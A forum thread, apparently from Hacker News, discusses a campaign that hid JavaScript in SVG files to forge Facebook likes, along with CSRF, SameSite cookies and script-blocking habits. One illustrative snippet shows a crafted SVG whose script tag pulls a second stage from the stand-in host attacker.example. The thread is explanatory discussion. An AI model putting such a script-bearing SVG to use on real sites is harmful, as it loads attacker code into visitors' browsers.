That led to the weird situation where browsers have two ways of embedding an SVG into a web page: embed it in an <img> tag and the JavaScript won't run, but embed it in an <iframe> and it will (though of course the iframe height can't auto-size...)
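A rough sketch of the two paths (hypothetical file name; TypeScript/DOM, but the behavior is standard):

    // Same SVG file, two embedding modes.
    // Assume image.svg contains e.g. <script>console.log("hi")</script>.

    // 1. As an image: the SVG is treated like a PNG, scripts never run,
    //    and the element sizes to the image's intrinsic dimensions.
    const img = document.createElement("img");
    img.src = "image.svg";
    document.body.append(img);

    // 2. As a document: scripts run, but the iframe keeps its fixed
    //    width/height and won't grow to fit the SVG's content.
    const frame = document.createElement("iframe");
    frame.src = "image.svg";
    frame.width = "300";
    frame.height = "150";
    document.body.append(frame);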
The javascript also means pretty much no user-generated-content sites allow the upload of SVGs. Wikipedia is the only place I can think of - and even they serve the SVG as a PNG almost everywhere.
At one time I agreed and had even deleted my genuine FB acct. But had to create another one briefly in 2021 to find a rental - where I live now.
I still have my ancient fake FB acct for Marketplace, etc but it's walled off.
Yes! And that container is in a Firefox instance, accessed as a remote app (I'm here now, but from a different container).
If you want real isolation, use browser profiles.
But it's certainly good advice to check no other windows have been opened.
Well there's your problem right there.
But does not fix the CSRF vulnerability, apparently.
In a world where same-site cookies are the default, you have to actively opt in to this sort of thing.
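For concreteness, a minimal sketch of that opt-in (hypothetical cookie names, Node's built-in http module): with SameSite=Lax as the browser default, a cookie only accompanies cross-site requests if the server explicitly asks for it with SameSite=None, which also requires Secure.

    import { createServer } from "node:http";

    createServer((req, res) => {
      res.setHeader("Set-Cookie", [
        // Default-ish: not sent on cross-site POSTs, so third-party pages
        // can't ride on the session to forge requests.
        "session=abc123; SameSite=Lax; Secure; HttpOnly",
        // Explicit opt-in to cross-site use, e.g. for an embedded widget.
        "widget_session=xyz789; SameSite=None; Secure; HttpOnly",
      ]);
      res.end("ok");
    }).listen(8080);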
Facebook might not care, but it is obviously a vulnerability. Sites can forge likes from users (which IIRC appear on timelines?).
Facebook does care. Allowing Like buttons on third-party sites was (at least historically) a major part of their business. It's not like they're just being apathetic here - they actively want people to be able to like things from outside of Facebook and put in effort to make that happen.
It would be nice if we had one of those, but SVG is not it, at least not unless you’re willing to gloss HTML as “an open format for rendering reflowable text”. SVG is a full platform for web applications with fixed-layout graphics and rich animations, essentially Flash with worse development tools.
There have been some attempts to define a subset of SVG that represents a picture, like SVG Tiny, but that feels about as likely to succeed as defining JSON by cutting things out of JavaScript. (I mean, it kind of worked for making EPUB from HTML+CSS... If you disregard all the insane feature variation across e-readers that is.) Meanwhile, other vector graphics formats are either ancient and not very common (CGM, EPS, WMF/EMF) or exotic and very not common (HVIF, IconVG, TinyVG).
(My personal benchmark for an actual vector format would be: does it allow the renderer to avoid knowing the peculiarities of Arabic, Burmese, Devanagari, or Mongolian?)
The best thing about Flash was that it let non-coders create interactive things. The editor with a timeline plus code you could attach to objects was the best feature.
I had to learn to code properly after Flash died, which was probably a good thing, but I still miss that way of making things.
But you are not missing Flash, you are missing Macromedia Director and co. Those were wonderful tools, intuitive and easy to use. Flash was an abomination of a format, and it was dragging the web down, security-wise too; it's good that Apple and Google killed it.
They did do that. Or am I missing something?
Also the dates don't work. HTTP/1.1 with gzip/compress/deflate encodings was live in browsers and servers, with inline compression, well before the standard was published as RFC 2068 in 1997. SVG's spec was four years behind that, and IIRC adoption was pretty glacial as far as completeness and compliance go.
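For reference, the negotiation in question, sketched with Node's built-in http and zlib modules (obviously not period software, just the same Accept-Encoding / Content-Encoding handshake HTTP/1.1 clients and servers were already doing):

    import { createServer } from "node:http";
    import { gzipSync } from "node:zlib";

    createServer((req, res) => {
      const body = `<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10"/>`;
      // The client advertises what it accepts; the server compresses
      // inline and labels the result.
      if (String(req.headers["accept-encoding"] ?? "").includes("gzip")) {
        res.writeHead(200, { "Content-Type": "image/svg+xml", "Content-Encoding": "gzip" });
        res.end(gzipSync(body));
      } else {
        res.writeHead(200, { "Content-Type": "image/svg+xml" });
        res.end(body);
      }
    }).listen(8080);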
Why are they clicking like buttons instead of stealing money from bank accounts then?
It's a bit annoying the first few days, but then the usual sites you frequent will all be whitelisted and all that's left are random sites you come across infrequently.
How does this work in reality? Do you just whitelist every site you come across if it's broken? What's the security advantage here? Or do you bail if it requires javascript? What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
It depends, but frequently, yes. E.g. if I'm about to read a tech blog and see it's from someone who can't make a couple of paragraphs work without scripting, that raises the chance that whatever they had to say wasn't going to be valuable, since they evidently don't know the basics.
It's the frontend version of people writing about distributed clusters to handle a load that a single minipc could comfortably handle.
Seems only narrowly applicable. I can see how you can use this logic to discount articles like "how to make a good blog" or whatever, but that's presumably only a tiny minority of the articles you'd read. If the topic is literally anything else, it doesn't really hold. It doesn't seem fair to discount whatever an AI engineer or DBA has to say because they don't share your fanaticism for lightweight sites. On the flip side, I see plenty of AI-generated slop that works fine with JavaScript disabled, because it's using some sort of SaaS (think Medium) or a static site generator.
For me, it's not about sites being lightweight, it's about sites not being trustworthy enough to allow them to run code on my machine.
For ML stuff I'd let e.g. mathjax fly, but I expect the surrounding prose to show up first to get me interested enough to enable scripts.
It's not an exact filter, but it gives some signal to feed into the "is this worth my time" model.
It's also odd to characterize it as fanaticism: scriptless sites are the default. If you just type words, it will work. You have to go out of your way to make a Rube Goldberg machine. I'm not interested in Rube Goldberg machines or the insights of the people that enjoy making them. Like if you own a restaurant and make your menu so that it's only available on a phone, I'll just leave. I don't appreciate the gimmick. Likewise for things that want me to install an app or use a cloud. Not happening.
Very approximately: there's a group that took the time to understand and attempted to build something robust, a group that has no interest in the web except as a means to an end so threw it at a well-reviewed static site generator, and a group that spent time futzing around with a Rube Goldberg machine yet didn't bother to seek deeper understanding.
The challenge is sites like StackOverflow which don't completely break, but have annoying formatting issues. Fortunately, uBlock lets you block specific elements easily with a few clicks, and I think you can even sync it to your phone.
But that basically negates all the security benefits, because all it takes to get a 0day payload to run is to make the content sufficiently enticing and make JavaScript "required" for viewing the site. You might save some battery/data usage, but if you value your time at all, I suspect any benefit is going to be eaten by having to constantly whitelist sites.
> if you value your time at all, I suspect any benefit is going to be eaten by having to constantly whitelist sites.
I don't constantly whitelist sites, only the ones I use regularly (like my email provider). Temporarily enabling JS on a broken site doesn't add it to my whitelist and only takes three clicks (which is muscle memory at this point):
1. Click to open the uBlock window
2. Click to allow JavaScript temporarily
3. Click to refresh the page
>Do you just whitelist every site you come across if it's broken?
Mostly, yes, often temporarily for that session, unless I do not trust a website, then I leave. How I deem what is trustworthy or not is just based on my own browsing experience I guess.
>What's the security advantage here?
You can block scripts, frames, media, webgl... Meaning no ads, no JS... Which helps minimize the more common ways to spread malware, or certain dark patterns, as well as just making browsing certain sites more pleasant without all the annoying stuff around.
>Or do you bail if it requires javascript?
If I don't trust a website, yes.
>What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
Not all sites require JS to work, and when they do, they don't require every single JS domain on the site to work. Many of the popular news sites, for example, try to load JS from 10 or more different domains and only really need one, or none, to be usable. Take CNN: I don't need to whitelist its main domain via NoScript to read articles or navigate, but the moment I whitelist CNN.com, I see a flood of other domains to whitelist which are definitely not needed, like CNN.io, cookielaw.org, optimizely.com, etc.
Take Hacker News. It's usable without JS: I can read, navigate, and comment. But if I want to use the search function, I need to whitelist algolia.com (which powers the search) or else I just see "This page will only work with JavaScript enabled". Search not working is the most common issue you'll find if you block all JS by default.
>Not all sites require JS to work, and when they do, they don't require every single JS domain on the site to work. Many of the popular news sites, for example, try to load JS from 10 or more different domains and only really need one, or none, to be usable. Take CNN: I don't need to whitelist its main domain via NoScript to read articles or navigate, but the moment I whitelist CNN.com, I see a flood of other domains to whitelist which are definitely not needed, like CNN.io, cookielaw.org, optimizely.com, etc.
Don't the default uBlock filter lists, plus maybe an extension for auto-closing cookie banners, get most of those?
A whitelist approach is less nuanced but far more extensive. It defaults to defending you against unknown vulnerabilities.
Even if other users do indeed whitelist everything needed in order to make sites work, they will still end up with many/most of the third-party scripts blocked.
I look at the breakage, consider how the site was promoted to me, and make a decision.
> What's the security advantage here?
Most of the bad stuff comes from third parties and doesn't provide essential functionality. A whitelist means you're unblocking one domain at a time, starting with the first party. If there's still an issue, it's usually clear what needs unblocking (e.g. a popular CDN, or one with a name that matches the primary domain) and what's a junk ad server or third-party tracking etc. You can even selectively enable various Google domains for example so that GMail still works but various third-party Google annoyances are suppressed.
> What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
Depends on trust levels of course, but there's at least some investigation that can be done to see that it actually is coming from Anubis or Cloudflare.
I do. If a site just doesn't work without JS, it's not likely to be a site that is valuable to me so nothing is lost.
Most websites load their required scripts from their own domain. So you allowlist the domain you are visiting, and things just work. However, many websites also load JS from like 20 other domains for crap like tracking, ads, 3rd party logins, showing cookie popups, autoplaying videos, blah blah blah. Those stay blocked.
Try it out: Visit your local news website, open your uBlock Origin panel, and take a look at all the domains in the left half. There will probably be dozens of domains it's loading JS from. 90% of the time, the only one you actually need is the top one. The rest is 3rd party crap you can leave disabled.
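For what it's worth, that workflow maps pretty directly onto uBlock Origin's dynamic filtering rules (the "My rules" pane). A rough sketch, with example.com standing in for the site you're visiting and cdn.example.net for the one extra domain it genuinely needs (both hypothetical):

    * * 3p-script block
    * * 3p-frame block
    example.com cdn.example.net * noop

The first two rules block third-party scripts and frames everywhere (first-party JS still loads); the noop line is the per-site exception you add from the panel.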
And yeah, if a website doesn't work after allowlisting two or three domains, I usually just give up and leave. Tons of 3rd party JS is a strong indicator that the website is trying to show you ads or exploit you, so it's a good signal that it's not worth your time.
NoScript is just too painful for people who want to just browse the web. It's the Gentoo of browser extensions. People with massive time and patience can do it, yes, but the rest of us are best served by uBlock and standard browser protections.
I was already convinced, you don't need to keep selling it ;)
They do, but as a long-time NoScript user I can tell you from personal experience that this content rarely does anything important, and leaving it out often improves your UX. Problems like you describe pop up... from time to time, for individual sites, maybe a few times a year, and definitely not on "regular sites".
And excluding that content almost invariably improves the page.
No, not really. Usually allowlisting just the site's own domain is enough. Very occasionally a site will serve scripts from some other domain, and it's usually obvious which one to allowlist. It takes like ten seconds, and you only need to do it once per domain if you make the allowlisting permanent. If you get really impatient, you can just allow all scripts for that tab and you're done.
It is some extra work, and I won't disagree if you think it's too much, but you're really overselling how much extra work it is.
This ought to be the default in every common web browser, just as you should have to look at the data sharing "partners" and decide whether they're benign enough for your taste.
If you are a woman, did you know Facebook has been stealing menstruation data from apps and using it to target ads to you?
If you take photos with your smartphone, you know meta has been using them to train their ai? Even if you haven't published them on Facebook?
To say nothing of Facebook's complicity in dividing cultures and fomenting violence and hate...
Facebook Marketplace supplanted a number of earlier sites - like Hotpads for rentals and Craigslist for cars.
In mid-2021 there were hundreds of applicants per rental listing - even on Marketplace. No one had the luxury of being picky about which site a listing was on.
I think I'm missing something; if you can embed arbitrary JavaScript in the SVG, why is a click necessary to make that JavaScript run? And if JavaScript on your page can exploit CSRF on Facebook, why is embedding it in an SVG necessary?
A human clicking something on the site tends to get around bot detection and similar systems put in place to prevent automation. This is a basic “get the user to take an action they don’t know the outcome of” attack.
E.g. you can't enable sound on a webpage without a real click.
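A small sketch of that user-activation gate (hypothetical audio file and button):

    const audio = new Audio("chime.mp3");

    // Run on page load: typically rejected with NotAllowedError,
    // because there has been no user gesture yet.
    audio.play().catch(err => console.log("autoplay blocked:", err.name));

    // Run from a real click: allowed, because the browser sees a genuine
    // user activation behind the call.
    document.querySelector("button")?.addEventListener("click", () => {
      void audio.play();
    });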
Running JS inside an image format sounds like a thing they could add permissions for (or a click-to-play overlay), especially if it can talk to other sites.
For this to work, the SVG has to be loaded in an iframe or in a new tab. Or it could be inlined in the HTML.
Nothing special about SVG really, as long as you (Facebook) treat SVG files as images and don't inline them.
The SVG part only really comes in as a way to hide script tags from anyone looking at the network requests, but even then it seems that the specific SVG was crafted to download further scripts.
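A harmless sketch of the shape being described (URLs hypothetical): an SVG is a full XML document, so it can carry <script> elements, and those only run when the file is opened as a document (tab, iframe, or inlined into the page), never when it's rendered through <img>.

    // What such a file can look like; the interesting code isn't in the
    // SVG itself, it just pulls a second stage from elsewhere.
    const craftedSvg = `
      <svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
        <script href="https://attacker.example/stage2.js"></script>
      </svg>`;

    // Rendered as an image, it's inert:
    const img = new Image();
    img.src = "data:image/svg+xml," + encodeURIComponent(craftedSvg);
    // Opened directly in a tab or iframe, the same markup is a document
    // and the script executes (and can fetch more).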
So what's the issue here exactly? It seems that Facebook is still somehow affected by XSS? Neat.
[1] https://www.malwarebytes.com/blog/news/2025/08/adult-sites-t...
- the OS previews it as an image, but on click it opens a website (which to be fair, once you click on a downloaded file, you're already done)
- SVGs are allowed in any "image/*" form, bypassing certain filters
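A sketch of the kind of naive check being referred to (hypothetical code, not any particular site's filter):

    // Treats SVG like any other image, even though an SVG can carry
    // scripts and links that a PNG or JPEG cannot.
    function isAllowedUpload(file: File): boolean {
      return file.type.startsWith("image/"); // also passes for "image/svg+xml"
    }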
Wouldn't that be discovered pretty quickly, when Bob's family and friends see porn promoted to them because Bob apparently liked it on Facebook? Eventually, one of them would mention it to him.
"Y'know, Bob, you probably don't want to be liking that on your main Facebook account... Are you feeling OK?"
I see what you did there ;)
The linked article just regurgitates the source.